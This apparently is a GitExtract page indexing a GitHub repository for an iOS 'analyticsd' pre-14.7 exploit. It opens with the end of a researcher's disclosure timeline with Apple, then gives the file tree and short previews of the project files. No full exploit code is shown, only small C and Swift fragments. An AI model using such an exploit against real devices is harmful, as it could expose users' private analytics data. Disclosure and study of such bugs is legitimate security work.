September 13 2021 - iOS 14.8 security contents list is published, still no mention of this vulnerability (https://support.apple.com/en-us/HT212807)
Same day I asked for an explanation and informed Apple that I would make all my reasearch public unless I receive a reply soon.
September 20 2021 - iOS 15.0 security contents list is published, still no mention of this vulnerability (https://support.apple.com/en-us/HT212814)
September 24 2021 - I still haven't received any reply
gitextract_735k5gzs/ ├── .gitignore ├── Analyticsd/ │ ├── Analyticsd-Bridging-Header.h │ ├── AnalyticsdApp.swift │ ├── Assets.xcassets/ │ │ ├── AccentColor.colorset/ │ │ │ └── Contents.json │ │ ├── AppIcon.appiconset/ │ │ │ └── Contents.json │ │ └── Contents.json │ ├── ContentView.swift │ ├── Info.plist │ ├── Preview Content/ │ │ └── Preview Assets.xcassets/ │ │ └── Contents.json │ ├── c.c │ └── c.h ├── Analyticsd.xcodeproj/ │ ├── project.pbxproj │ └── project.xcworkspace/ │ ├── contents.xcworkspacedata │ └── xcshareddata/ │ └── IDEWorkspaceChecks.plist └── README.md
Condensed preview — 15 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (33K chars).
[
{
"path": ".gitignore",
"chars": 2171,
"preview": "# Xcode\n#\n# gitignore contributors: remember to update Global/Xcode.gitignore, Objective-C.gitignore & Swift.gitignore\n\n"
},
{
"path": "Analyticsd/Analyticsd-Bridging-Header.h",
"chars": 840,
"preview": "#include \"c.h\"\n//\n//@import Foundation;\n//\n//typedef void * xpc_object_t;\n//typedef void * xpc_connection_t;\n//typedef v"
},
{
"path": "Analyticsd/AnalyticsdApp.swift",
"chars": 143,
"preview": "import SwiftUI\n\n@main\nstruct AnalyticsdApp: App {\n var body: some Scene {\n WindowGroup {\n ContentVi"
},
{
"path": "Analyticsd/Assets.xcassets/AccentColor.colorset/Contents.json",
"chars": 123,
"preview": "{\n \"colors\" : [\n {\n \"idiom\" : \"universal\"\n }\n ],\n \"info\" : {\n \"author\" : \"xcode\",\n \"version\" : 1\n }"
},
{
"path": "Analyticsd/Assets.xcassets/AppIcon.appiconset/Contents.json",
"chars": 1591,
"preview": "{\n \"images\" : [\n {\n \"idiom\" : \"iphone\",\n \"scale\" : \"2x\",\n \"size\" : \"20x20\"\n },\n {\n \"idiom\""
},
{
"path": "Analyticsd/Assets.xcassets/Contents.json",
"chars": 63,
"preview": "{\n \"info\" : {\n \"author\" : \"xcode\",\n \"version\" : 1\n }\n}\n"
},
{
"path": "Analyticsd/ContentView.swift",
"chars": 4918,
"preview": "import SwiftUI\n\nstruct ContentView: View {\n @State var json = \"\"\n @State var jsonData: [(String,Any)] = []\n\n va"
},
{
"path": "Analyticsd/Info.plist",
"chars": 1580,
"preview": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/P"
},
{
"path": "Analyticsd/Preview Content/Preview Assets.xcassets/Contents.json",
"chars": 63,
"preview": "{\n \"info\" : {\n \"author\" : \"xcode\",\n \"version\" : 1\n }\n}\n"
},
{
"path": "Analyticsd/c.c",
"chars": 559,
"preview": "#include \"c.h\"\n\nvoid * normal_function1(const char * arg1, int arg2) {\n return ((void *(*)(const char *, int))((long "
},
{
"path": "Analyticsd/c.h",
"chars": 278,
"preview": "#ifndef c_h\n#define c_h\n\n#define NO_UND(func) extern void func(void) asm(#func);\nNO_UND(dyld_stub_binder);\n\nvoid * norma"
},
{
"path": "Analyticsd.xcodeproj/project.pbxproj",
"chars": 13187,
"preview": "// !$*UTF8*$!\n{\n\tarchiveVersion = 1;\n\tclasses = {\n\t};\n\tobjectVersion = 50;\n\tobjects = {\n\n/* Begin PBXBuildFile section *"
},
{
"path": "Analyticsd.xcodeproj/project.xcworkspace/contents.xcworkspacedata",
"chars": 135,
"preview": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<Workspace\n version = \"1.0\">\n <FileRef\n location = \"self:\">\n </FileRef"
},
{
"path": "Analyticsd.xcodeproj/project.xcworkspace/xcshareddata/IDEWorkspaceChecks.plist",
"chars": 238,
"preview": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/P"
},
{
"path": "README.md",
"chars": 3941,
"preview": "# Analyticsd pre-14.7 exploit\n\nI've updated this code to avoid using Private API directly. Read more in my [blog post](h"
}
]
About this extraction
This page contains the full source code of the illusionofchaos/ios-analyticsd-pre14.7-exploit GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 15 files (29.1 KB), approximately 9.0k tokens. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.